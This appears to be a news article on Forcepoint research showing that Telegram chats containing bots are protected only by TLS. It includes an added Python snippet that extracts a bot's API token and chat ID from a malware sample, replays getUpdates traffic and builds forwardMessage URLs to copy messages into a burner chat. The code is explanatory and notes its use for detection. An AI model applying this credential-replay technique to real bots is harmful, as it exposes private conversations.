Be Careful Using Bots On Telegram

The secure messaging app Telegram is significant for two very different reasons. One is that the app is a go-to encrypted communication tool for hundreds of millions of users around the world, particularly those looking to duck government surveillance and censorship in countries like Russia and Iran. The other is that many cryptography experts have cast doubt on the integrity of Telegram’s encryption scheme. A new report from the web security firm Forcepoint, about Telegram’s use of bots, has implications for both Telegram’s users and its critics.

Telegram bots are small programs that can be embedded in Telegram chats or public channels to perform a specific function. They can offer customized keyboards, produce cat memes on demand, or even accept payments and act as a digital storefront. Bots are popular on Telegram because they are fun and convenient, and Telegram has supported them since 2015. They are essentially automated Telegram accounts: you add them to chats and channels as you would a friend. While researching the bot platform, however, Forcepoint realized that bots do not speak the encryption protocol Telegram uses to protect its chats. Adding a bot to a chat or channel therefore weakens its security, because every message the bot is allowed to see leaves Telegram's own protocol and becomes easier for a third party to intercept.

“This is something that affects you if you are operating a bot or are in a channel with bots,” says Luke Somerville, head of special investigations at Forcepoint. “I’ll be honest, it surprised us when we realized that the bot security is that different than how normal messaging works.”

Specifically, Telegram bots don’t use MTProto, Telegram’s own encryption protocol, which is what scrambles users’ messages so they are illegible in transit: between a device and Telegram’s servers in ordinary chats and groups, and between the two devices in secret chats. Researchers have raised various concerns about MTProto over the years, and Telegram maintains it is sound, but the point is that if you trust Telegram with your secure communications, you’re trusting MTProto.

Telegram’s bot platform relies instead on TLS, the transport-layer encryption used by HTTPS. TLS protects a single hop, here the connection between Telegram’s API servers and whatever server the bot operator runs; Telegram’s servers and the bot operator hold those messages in plaintext, and anyone who can present the bot’s credentials to the API gets them in plaintext too. That is fine for a website but not enough on its own for a messaging service meant to provide advanced protection, which is why apps like Signal and WhatsApp use the Signal Protocol and Telegram has MTProto. By building its bot platform without MTProto, Telegram creates a situation where introducing a bot to a chat or channel effectively downgrades the encryption of every message the bot can see to plain TLS.


Forcepoint made the discovery in an unexpected way. Security researchers had previously found Telegram bots used as the command-and-control channel for malicious Android apps, and even used to exfiltrate data from Telegram chats through the Bot API meant for developers. Bots’ deep integration into the app makes them a popular pawn in attack strategies. While researching one such malware scheme, Forcepoint stumbled on the reduced security of chats that include bots.

The researchers probed a sample of remote-management malware dubbed GoodSender and identified the code that waited for commands from a Telegram bot. The malware embedded two pieces of Telegram identification and authentication data, the bot API token and the chat ID, which direct a bot’s requests to the right chat. Armed with these, the researchers realized they could craft their own Bot API requests and essentially replay all the communications between the malware author and his bot. Because the author had done all of his testing and deployment in one bot setup, instead of covering his tracks with multiple accounts, the researchers could see how he had set up, tested, and eventually started deploying the malware.

While the Forcepoint researchers used the Telegram API to snoop on the hacker’s bot communications as well-meaning defensive analysis, they emphasize that someone else could use the same technique for ill and read back an entire conversation a bot is present in. And an attacker who doesn’t get a bot’s API token and chat ID from a malware sample could still obtain them in other ways: the token is part of the URL of every Bot API request the bot makes, and the chat ID rides in every update and reply so the bot knows which chat to answer, so anyone who can read the bot’s code, its logs, or its decrypted HTTPS traffic has both.

The idea that a secure messaging service’s own feature could downgrade its encryption scheme—without giving any visual cue to the user—is concerning. “You can create your own burner Telegram account and tell the bot to forward you these messages,” Somerville says. “It’s relatively trivial to do, and you can forward all the messages in that channel that the bot has had access to. You’ll be able to read all the messages they’ve exchanged.”
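The technique the preceding paragraphs describe (recover the bot token and chat ID from a sample, then use the public Bot API to read back or forward what the bot saw) can be shown without touching the network. The following is an added example written for this page, not Forcepoint’s, GoodSender’s or Telegram’s code. The token regex, the config blob and the getUpdates response are constructed for illustration and no request is actually sent; only the method names (`getUpdates`, `forwardMessage`) and the `https://api.telegram.org/bot<token>/<method>` URL layout are the documented Bot API ones.

```python
import json
import re
from urllib.parse import urlencode

BOT_API = "https://api.telegram.org/bot{token}/{method}"

# Bot tokens take the form "<bot user id>:<secret>"; the ~35-character secret
# length is an assumption drawn from published tokens, not a Telegram guarantee.
TOKEN_RE = re.compile(rb"(\d{8,10}):([A-Za-z0-9_-]{30,40})(?![A-Za-z0-9_-])")
# Chat IDs are signed integers (negative for groups, supergroups and channels).
# Assumed here to sit next to a "chat_id" label, as in a config file or JSON body.
CHAT_ID_RE = re.compile(rb"chat_id[=:\"'\s]+(-?\d{5,14})")

# Constructed stand-in for strings dumped from a sample; not GoodSender's real config.
SAMPLE_STRINGS = b"""
[c2]
api=https://api.telegram.org/bot123456789:AAHfiqksKZ8WmR2zSjiQ7_v4TDbU1nV6Opq/sendMessage
chat_id=-1001234567890
"""

# Constructed getUpdates response in the documented shape; the messages are invented.
SAMPLE_UPDATES = json.dumps({
    "ok": True,
    "result": [
        {"update_id": 100, "message": {
            "message_id": 41, "from": {"username": "operator"},
            "chat": {"id": -1001234567890, "type": "supergroup"},
            "date": 1547000000, "text": "/start"}},
        {"update_id": 101, "message": {
            "message_id": 42, "from": {"username": "operator"},
            "chat": {"id": -1001234567890, "type": "supergroup"},
            "date": 1547000100, "text": "run keylogger on host-17"}},
    ],
})


def extract_bot_credentials(blob):
    """Pull (token, chat_id) out of a byte blob; missing parts come back as None."""
    tok = TOKEN_RE.search(blob)
    cid = CHAT_ID_RE.search(blob)
    token = tok.group(1).decode() + ":" + tok.group(2).decode() if tok else None
    chat_id = int(cid.group(1)) if cid else None
    return token, chat_id


def bot_api_url(token, method, **params):
    """Build a Bot API URL. The token is the whole credential: it sits in the
    path of every request the bot makes, and whoever holds it can call any method."""
    url = BOT_API.format(token=token, method=method)
    return url + ("?" + urlencode(params) if params else "")


def replay_updates(updates_json):
    """Flatten a getUpdates response into (chat_id, sender, text) rows.
    This is the 'replay': the API hands back, in plaintext, whatever the bot
    was allowed to see and has not yet acknowledged."""
    rows = []
    for upd in json.loads(updates_json).get("result", []):
        msg = upd.get("message") or upd.get("channel_post")
        if msg is None:
            continue
        sender = (msg.get("from") or {}).get("username", "(channel)")
        rows.append((msg["chat"]["id"], sender, msg.get("text", "")))
    return rows


def forward_requests(token, from_chat_id, to_chat_id, message_ids):
    """forwardMessage URLs that would copy each message into a burner chat,
    the step Somerville describes. Nothing is sent here."""
    return [bot_api_url(token, "forwardMessage", chat_id=to_chat_id,
                        from_chat_id=from_chat_id, message_id=m)
            for m in message_ids]


if __name__ == "__main__":
    token, chat_id = extract_bot_credentials(SAMPLE_STRINGS)
    print("token:", token, "chat_id:", chat_id)
    print("would GET", bot_api_url(token, "getUpdates", offset=0))
    for row in replay_updates(SAMPLE_UPDATES):
        print("  ", row)
    for url in forward_requests(token, chat_id, 777000, [41, 42]):
        print("would GET", url)
```

Two caveats keep this honest. `getUpdates` returns only updates the bot has not yet confirmed and that Telegram still holds (the documentation gives 24 hours), and it errors while a webhook is registered, so a token holder sees recent traffic rather than full history; and in groups a bot in its default privacy mode receives only commands, replies and messages addressed to it, unless the operator disabled privacy mode or made the bot an admin. The same `TOKEN_RE` run over a sample, a proxy log or a code repository is a cheap detection for Telegram-based C2 or leaked bot credentials; the operator’s remedy for a leaked token is to revoke it in BotFather, which invalidates every request built from the old value.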

Forcepoint has been in touch with Telegram about the findings, but wouldn’t comment on its interactions with the company. “That bot traffic goes over HTTPS is not something to be ‘discovered’—it’s a documented property of the system,” Markus Ra, Telegram’s head of support, said in a statement. “This is an industry standard. Note that by default, Telegram bots only receive messages that are specifically meant for them.” Telegram also argues that grabbing the bot API token and Chat ID is akin to stealing someone’s password to an account—at that point an attacker would have full access anyway. The company did not offer an explanation for why bot communications are secured only with HTTPS and not MTProto.

Taking advantage of the weaker protection on Telegram chats and channels that include bots still requires the attacker to get hold of the bot’s credentials, either by decrypting the bot’s HTTPS traffic or by finding them where the operator left them. In Forcepoint’s case the researchers had the keys to the kingdom in the malware sample they were working on. In general, a relatively sophisticated adversary would have to be targeting you to become a man in the middle of your HTTPS connection. But the reason secure communication platforms layer more-advanced encryption on top in the first place is precisely that HTTPS alone can sometimes be skirted.

“In a situation where certain chats only use TLS because of bot functionality, a bot would dramatically undercut the security properties of a chat,” says Kenn White, director of the Open Crypto Audit Project. “Using a protocol that’s not part of the core protocol for a convenience integration would provide none of the integrity or benefit of that main protocol. That would be an intentional design trade-off that dramatically undermines security guarantees.”

To keep your Telegram communications safe, don’t add bots to your chats, and be aware when you’re in chats and channels that include them. Note that bots can only be added to ordinary chats, groups and channels, which Telegram encrypts between your device and its servers rather than end to end; secret chats, the one mode that is end-to-end encrypted, cannot contain bots at all. And to keep messages really secret, always minimize the number of people in a chat to reduce exposure. Many cryptographers and security engineers, though, including White, say that the safest way to use Telegram is not to use it at all. They doubt whether Telegram is fully end-to-end encrypted (a protection that isn’t on by default anyway) and worry that the custom MTProto protocol is difficult to fully vet. But for the app’s 200 million users, the security differences between chats that include bots and chats that don’t are important.

“For bot developers there’s not an awful lot they can do about this themselves other than warning people that the potential for this sort of attack exists,” Forcepoint’s Somerville says. “It’s unfortunate—it’s a design decision.”


Updated January 17, 2019, 8:50am ET and 11:50am ET to include comments from Telegram.
